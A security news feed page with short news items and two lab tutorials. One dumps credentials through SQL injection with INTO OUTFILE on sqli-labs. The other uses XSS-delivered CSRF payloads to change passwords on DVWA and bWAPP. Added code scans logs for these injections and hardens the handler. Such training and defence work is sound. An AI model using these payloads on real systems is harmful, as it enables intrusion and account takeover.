Feed aggregator

Russia threatening to ban Telegram encrypted messaging app

News from 'Help Net Security' - 31 min 43 sec ago
Roskomnadzor, Russia’s communications regulator, is threatening to ban the use of popular encrypted messaging app Telegram. The request Roskomnadzor is a federal agency tasked with overseeing that the media, telecoms and other mass communications providers comply with existing laws and adequately protect the confidentiality of personal data being processed. Its head, Alexander Zharov, claims that Telegram (the company) has not responded to repeated requests to fill in a form with information on the company that … More →
Categories: Cyber India

Anthem ready to pay $115 million to settle data breach lawsuit

News from 'Help Net Security' - 2 hours 44 min ago
US health insurer Anthem has agreed to pay $115 million to settle a class-action suit mounted in the wake of the massive data breach it suffered in late 2014/early 2015. The data breach The breach was the largest healthcare breach to that date, and resulted in the compromise of information about 78.8 million Anthem customers and customers of other insurers affiliated with Anthem: names, birthdays, medical IDs/social security numbers, street addresses, email addresses and employment … More →
Categories: Cyber India

Dumping Database using Outfile

News from 'Hacking Articles' - 6 hours 27 min ago

In our previous article you learned the basic concepts of SQL injection, but in some scenarios you will find that your basic knowledge and tricks fail. Today we are going to use the SELECT … INTO OUTFILE statement, which is the easiest way of exporting a table's records into a text file or Excel file.

This statement allows a user to write table information very rapidly to a text file on the server machine. SELECT … INTO OUTFILE writes the selected rows to a file and lets you use column and row terminators to specify the output format. The output file is created directly by the MySQL server, so the file name must include the path where the user wants the file written on the server host. The file must not already exist on the server; it cannot be overwritten. A user requires the FILE privilege to run this statement.

Let’s start!!

Lesson 7

Open the browser and type the following SQL query in the URL:

http://localhost:81/sqli/Less-7/?id=1

From the screenshot you can read “you are in….. Use outfile”; now let’s try to break this statement.

OKAY! The query has been broken successfully: we receive an error message when we use a single quote (') to break the query, which confirms that it is vulnerable.

http://localhost:81/sqli/Less-7/?id=1'

After a lot of effort the query finally gets fixed. If you noticed, the steps for SQL injection are similar to the previous chapter; only the technique to fix the query is different.

http://localhost:81/sqli/Less-7/?id=1')) --+

Now the following query will dump the result into a text file. Here you need to mention the path where you want the file written on the server host. The file must not already exist on the server, so always use a new text file for each dump of database information.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,3 into outfile "/xampp/htdocs/sqli/Less-7/hack1.txt" --+

From the screenshot you can see that it still shows an error message. Now open another tab to view the output of the query.

http://localhost:81/sqli/Less-7/

Now add the file name hack1.txt to check the output of the above query.

http://localhost:81/sqli/Less-7/hack1.txt

Hence you can see that we get the output of the executed query inside the text file. The hack1.txt file is also saved on the server machine.

Execute the following query to retrieve the database name using union injection and a new text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,2,database() into outfile "/xampp/htdocs/sqli/Less-7/hack2.txt" --+

http://localhost:81/sqli/Less-7/hack2.txt

Hence you can see that we have successfully got security as the database name.

The next query will provide all the table names saved inside the database, using another text file.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() into outfile "/xampp/htdocs/sqli/Less-7/hack3.txt" --+

http://localhost:81/sqli/Less-7/hack3.txt

From the screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find the column names of the users table using the following query.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' into outfile "/xampp/htdocs/sqli/Less-7/hack4.txt" --+

http://localhost:81/sqli/Less-7/hack4.txt

Hence you can see that it contains many columns; I chose only two columns for further enumeration.

C1: username

C2: password

Finally, execute the following query to read all the usernames and passwords from the columns of the users table.

http://localhost:81/sqli/Less-7/?id=1')) union select 1,group_concat(username),group_concat(password) from users into outfile "/xampp/htdocs/sqli/Less-7/hack5.txt" --+

http://localhost:81/sqli/Less-7/hack5.txt

From the screenshot you can read the usernames and passwords saved inside the text file.

Note: you can try the same attack using an Excel file; the attacker only needs to change hack1.txt to hack1.csv, which will save the output into an Excel file.
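
On the detection side, the sequence above leaves a recognisable trail in the web server's access log: a request whose query string contains INTO OUTFILE, followed by a fetch of the file it named. The following is an added example, not part of the original post; the log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not from the page); payloads mirror the tutorial's.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Jun/2017:10:00:01 +0000] "GET /sqli/Less-7/?id=1 HTTP/1.1" 200 721',
    '10.0.0.5 - - [26/Jun/2017:10:00:09 +0000] "GET /sqli/Less-7/?id=1%27))%20union'
    '%20select%201,2,3%20into%20outfile%20%22/xampp/htdocs/sqli/Less-7/hack1.txt%22'
    '%20--+ HTTP/1.1" 200 745',
    '10.0.0.5 - - [26/Jun/2017:10:00:15 +0000] "GET /sqli/Less-7/hack1.txt HTTP/1.1" 200 6',
    '10.0.0.9 - - [26/Jun/2017:10:01:00 +0000] "GET /sqli/Less-7/?id=2%20UNION/**/SELECT'
    '%201,database(),3%20INTO/**/OUTFILE%20%27/tmp/x.csv%27 HTTP/1.1" 200 745',
    '10.0.0.7 - - [26/Jun/2017:10:02:00 +0000] "GET /blog/?q=file+a+union+grievance HTTP/1.1" 200 512',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
WRITE = re.compile(r"\binto\s+(outfile|dumpfile)\s+['\"]([^'\"]+)['\"]")
EXTRA = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
}

def normalize(query):
    """URL-decode twice (double encoding), replace /**/ comments, lowercase."""
    text = unquote_plus(unquote_plus(query))
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).lower()

def scan(lines):
    """Return (line no, client, kind, tags, path) for writes and later fetches."""
    findings, written = [], {}
    for number, line in enumerate(lines, 1):
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        query = normalize(url.query)
        write = WRITE.search(query)
        if write:
            tags = ["into-" + write.group(1)]
            tags += [name for name, rx in EXTRA.items() if rx.search(query)]
            # Remember the file name so a later download of it can be correlated.
            written[re.split(r"[\\/]", write.group(2))[-1]] = number
            findings.append((number, client, "file-write attempt", tags, write.group(2)))
            continue
        name = unquote_plus(url.path).lower().rsplit("/", 1)[-1]
        if name in written:
            note = ["written at line %d" % written[name]]
            findings.append((number, client, "fetch of written file", note, url.path))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs only show GET query strings, so the same check on POST bodies needs application or WAF logging.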

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post Dumping Database using Outfile appeared first on Hacking Articles.

Categories: Cyber India

German law enforcement gets new hacking powers

News from 'Help Net Security' - 6 hours 59 min ago
On Thursday, the Bundestag voted to accept a new amendment that will expand the German police’s hacking powers. The new amendment will allow them to use so-called “federal Trojans” to hack into targets’ computer, smartphone or tablet, and access all types of digital communication before it is encrypted, as well as other private data (photos, videos, etc). Before this, the federal Trojan was apparently used only for telecommunication surveillance – phone calls and text … More →
Categories: Cyber India

With ransomware, pay up if you want to keep paying

News from 'Help Net Security' - 9 hours 3 min ago
A hospital CEO is contacted in the middle of the night with a dire warning. Hackers have taken control of computer systems used for patient care, CT scans, and lab work. The hacker wants money. Rather than pay the ransom, the hospital CEO enlists several experts to try to break back into the system. It fails. Time is wasted, and the CEO has a choice. He could pay the ransom, about $17,000. Or he could … More →
Categories: Cyber India

Most businesses will not put off cloud adoption because of security concerns

News from 'Help Net Security' - 9 hours 32 min ago
Businesses are pressing ahead with their digital transformation plans, despite fears of being hit by a cyber attack or data protection regulations. This is according to a new independent research report from Advanced, which questioned over 500 senior executives in UK organisations about their attitudes to using the cloud as part of their digital transformation plans. Cloud adoption going strong Most organisations surveyed are concerned about security (82%) and data protection (68%) in the cloud … More →
Categories: Cyber India

Crowdsourced security testing and bug bounties

News from 'Help Net Security' - 10 hours 3 min ago
In the past few years, the bug bounty economy has been growing steadily, with more organizations getting on board every day. In this podcast, Ilia Kolochenko, CEO at High-Tech Bridge, talks about crowdsourced security testing and bug bounties. Here’s a transcript of the podcast for your convenience. Hello, my name is Ilia Kolochenko, I’m CEO and founder of High-Tech Bridge. I would probably say that bug bounties is a very interesting concept that first of … More →
Categories: Cyber India

Week in review: Evaluating AI-based cyber security systems, how CIA hit air-gapped computers

News from 'Help Net Security' - Mon, 26/Jun/2017 - 07:30
Here’s an overview of some of last week’s most interesting news and articles: How the CIA gained access to air-gapped computers A new WikiLeaks release of documents believed to have been stolen from the CIA shows the intelligence agency’s capability to infect air-gapped computers and networks via booby-trapped USB sticks. Hackers extorted a cool $1 million from South Korean web hosting provider Whether through ransomware, or simply by breaking into computer systems and exfiltrating and … More →
Categories: Cyber India

CSRF Exploitation using XSS

News from 'Hacking Articles' - Sat, 24/Jun/2017 - 16:44

Hello friends! In our previous article we saw how an attacker can target a web application with a CSRF vulnerability with the help of Burp Suite. Today we are again going to test a CSRF attack, this time with the help of an XSS vulnerability. As we know, with the help of XSS an attacker might be able to read cookies from the same domain, and if CSRF tokens are stored in cookies then the attacker will be able to read the CSRF token from a CSRF-protected POST.

Let’s have a look at how an attacker can make a CSRF attack to change the password of the admin account when the web application suffers from a cross-site scripting vulnerability. For this tutorial I used DVWA and set its security level to low.

Suppose that you have found an XSS vulnerability in a web application server. Here we are going to use JavaScript or an HTML script which will make a CSRF attack to change the password of the admin account.

An XSS attack can be used to read the cookies and get the valid tokens, if they are stored in cookies, which have to be inserted in the malicious script to make CSRF possible. Using an image tag we will send a malicious script; inside the script I set the new password to 123456.

<img src="/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change">

Now let’s check whether the password for admin has been changed. Previously the credentials were admin: password; if admin fails to log in to the web server using the previous credentials, then we have successfully made the CSRF attack.

From the given screenshot you can see that logging in with admin: password fails. Now use your new password 123456 to log in to the web server.

Similarly, there is another web application, bWAPP, where we will demonstrate the same attack using an XSS vulnerability. First you need to choose your bug, “cross site scripting Reflected (post)”, and set the security level to low.

In the given screenshot the form suffers from an XSS vulnerability. Now we are going to generate a script that makes CSRF possible in order to change a user's password. Here we are logged in as bee: bug on the web server; now we will try to change its password with the help of cross-site scripting.

Similarly, using an image tag we will send a malicious script; inside the script I set the new password to hack.

<img src="/bwapp/csrf_1.php?password_new=hack&password_conf=hack&action=change">

From the screenshot you can see the generated image icon, which means this form has XSS flaws. Now let's check whether the password has been modified for user bee.

Now use the previous credentials bee: bug. If the login fails, it means we have successfully carried out the CSRF attack, and from the screenshot you can see the “invalid credential or user not activated” message. Now use the new password to log in to the web server.

Conclusion: if an XSS vulnerability exists anywhere in the same domain, it can lead to a CSRF attack and allow attackers to remotely control the target’s browser with full rights, making CSRF protection useless.
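
For the defender, the two requests above succeed because the password change is reachable over GET and asks for nothing the browser does not send automatically. The following is an added example, not code from the original post, DVWA or bWAPP: a framework-free sketch of a hardened handler. The parameter names csrf_token and password_current, and all function and class names, are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

class Account:
    """Stores a salted PBKDF2 hash of the password, never the password itself."""
    def __init__(self, password):
        self.set_password(password)

    def _hash(self, password):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 100_000)

    def set_password(self, password):
        self.salt = secrets.token_bytes(16)
        self.digest = self._hash(password)

    def check(self, password):
        return hmac.compare_digest(self.digest, self._hash(password))

def change_password(method, params, session, account):
    """Hardened handler (hypothetical): returns (HTTP status, reason)."""
    if method != "POST":                       # an <img src=...> can only issue GET
        return 405, "state change not allowed over GET"
    token = params.get("csrf_token", "")
    if not hmac.compare_digest(token.encode(), session["csrf_token"].encode()):
        return 403, "missing or wrong CSRF token"
    if not account.check(params.get("password_current", "")):
        return 403, "current password required"  # holds even if XSS read the token
    new = params.get("password_new", "")
    if not new or new != params.get("password_conf"):
        return 400, "new password and confirmation differ"
    account.set_password(new)
    return 200, "password changed"

def demo():
    """Replay the page's request shape against the hardened handler."""
    account = Account("password")              # constructed sample credentials
    session = {"csrf_token": secrets.token_urlsafe(32)}
    forged = {"password_new": "123456", "password_conf": "123456", "Change": "Change"}
    with_token = {**forged, "csrf_token": session["csrf_token"]}
    results = [
        change_password("GET", forged, session, account)[0],       # the <img> request
        change_password("POST", forged, session, account)[0],      # cross-site form
        change_password("POST", with_token, session, account)[0],  # token read via XSS
    ]
    still_valid = account.check("password")
    legit = {**with_token, "password_current": "password"}
    results.append(change_password("POST", legit, session, account)[0])
    return results, still_valid, account.check("123456")

if __name__ == "__main__":
    print(demo())
```

Requiring the current password limits what an injected script can change silently; the XSS flaw itself still has to be fixed.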

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

The post CSRF Exploitation using XSS appeared first on Hacking Articles.

Categories: Cyber India

Microsoft's Private Windows 10 Internal Builds and Partial Source Code Leaked Online

News from 'The Hackers News' - Sat, 24/Jun/2017 - 16:39
A massive archive of Microsoft's top-secret Windows 10 builds, and the source codes for private software has been reportedly leaked online, which could lead to a nasty wave of Windows 10 exploits, journalist at the Reg claims. The leaked files – uploaded on BetaArchive website – contain more than 32 terabytes of data, which includes many non-public Windows 10 and Windows Server 2016 builds
Categories: Cyber India

How the CIA gained access to air-gapped computers

News from 'Help Net Security' - Sat, 24/Jun/2017 - 00:25
A new WikiLeaks release of documents believed to have been stolen from the CIA shows the intelligence agency’s capability to infect air-gapped computers and networks via booby-trapped USB sticks. The Brutal Kangaroo project The agency would start by infecting an Internet-connected computer inside the target organizations with malware, which would infect inserted USB sticks with another piece of malware. If such a USB is ultimately inserted in the air-gapped computer, it will get infected with … More →
Categories: Cyber India

Password Reset MITM: Exposing the need for better security choices

News from 'Help Net Security' - Fri, 23/Jun/2017 - 23:43
Attackers that have set up a malicious site can use users’ account registration process to successfully perform a password reset process on a number of popular websites and messaging mobile applications, researchers have demonstrated. The Password Reset MITM attack The Password Reset Man in the Middle (PRMITM) attack exploits the similarity of the registration and password reset processes. To launch such an attack, the attacker only needs to control a website. To entice victims to … More →
Categories: Cyber India

Rivals Rev Up as Uber Hits the Skids

News from 'TechNewsWorld' - Fri, 23/Jun/2017 - 23:41
As Uber reels from the fallout of a sexual harassment scandal that led to the ouster of Travis Kalanick and several of his top executives, the company faces twin dilemmas: how to clean up its corporate work environment and restock its executive ranks; and how to maintain credibility with its customer base and core team of street level drivers. Uber controls more than 80 percent of the domestic ride-sharing market, by many estimates, and it competes strongly in major cities around the world. However, rival firms are now nipping at its heels.
Categories: Cyber India

Internet crime: The continuing rise of the BEC scam

News from 'Help Net Security' - Fri, 23/Jun/2017 - 20:37
Through its website, the FBI’s Internet Crime Complaint Center (IC3) accepts complaints about Internet-facilitated criminal activity, and forwards them to the appropriate law enforcement agencies (both in and outside the US) to investigate. The only condition that has to be satisfied in order for a report to be considered and acted upon is that either the victim or the alleged subject of the crime is located within the United States. The IC3 is, therefore, in … More →
Categories: Cyber India

New infosec products of the week: June 23, 2017

News from 'Help Net Security' - Fri, 23/Jun/2017 - 19:33
API Behavioral Security: Detecting and blocking attacks targeting API infrastructures Elastic Beam unveiled its flagship solution, API Behavioral Security (ABS), the first AI-powered software platform able to detect and block cyberattacks that target APIs to compromise corporate data and systems – in public clouds, hybrid clouds, or on premise. ABS requires no predefined policies, security rules, or attack signatures, and can stop attacks that are new and constantly changing. Its API activity reporting simplifies forensic … More →
Categories: Cyber India

Organizations still unclear on cloud security responsibility

News from 'Help Net Security' - Fri, 23/Jun/2017 - 18:30
Vanson Bourne surveyed 1,300 IT decision makers from organizations using public cloud Infrastructure as a Service (IaaS) from the Americas, Europe, Middle East and Africa (EMEA), and from Asia Pacific (APAC). Background public cloud use Respondents’ use of public cloud is on the rise, as is their sophistication in working within the cloud. On average, organizations have nearly 40 percent of their infrastructure in the public cloud today, with the expectation to increase this to … More →
Categories: Cyber India

Two British Men Arrested For Hacking Microsoft

News from 'The Hackers News' - Fri, 23/Jun/2017 - 15:52
British police have arrested two men in the UK for conspiring to hack into the computer networks of US tech giant Microsoft with plans to steal customers’ data from the software giant. The suspects, a 22-year-old from Sleaford and a 25-year-old from Bracknell, were arrested by detectives from Britain's South East Regional Organised Crime Unit (SEROCU) Thursday morning (22 June 2017). The
Categories: Cyber India

New GhostHook Attack Bypasses Windows 10 PatchGuard Protections

News from 'The Hackers News' - Fri, 23/Jun/2017 - 11:19
Vulnerabilities discovered in Microsoft PatchGuard kernel protection could allow hackers to plant rootkits on computers running the company's latest and secure operating system, Windows 10. Researchers at CyberArk Labs have developed a new attack technique which could allow hackers to completely bypass PatchGuard, and hook a malicious kernel code (rootkits) at the kernel level. PatchGuard,
Categories: Cyber India

DHS to Congress: The Russians Are Coming Back

News from 'TechNewsWorld' - Fri, 23/Jun/2017 - 03:18
The House Intelligence Committee on Wednesday conducted a hearing focusing on the impact of Russian hacking on the 2016 elections. Members of the committee heard testimony from former DHS Secretary Jeh Johnson, who was in charge of the department when the actual hacking took place during the final months of the Obama administration. During that hearing, Johnson reiterated that Russian President Vladimir Putin had ordered the hacking with the intent of influencing the outcome of the U.S. elections.
Categories: Cyber India

Microsoft extends the Microsoft Edge Bounty Program

News from 'Help Net Security' - Fri, 23/Jun/2017 - 00:31
Initially time-bound, the Microsoft Edge Bounty Program has now been turned into one that will run indefinitely, Microsoft has announced. The past and present of the Microsoft Edge Bounty Program “Since 2013, we have launched three browser bounties to uncover specific vulnerabilities. As security is a continuous effort and not a destination, we prioritize identifying different types of vulnerabilities in different points of time,” says Akila Srinivasan, a program manager with the Microsoft Security Response … More →
Categories: Cyber India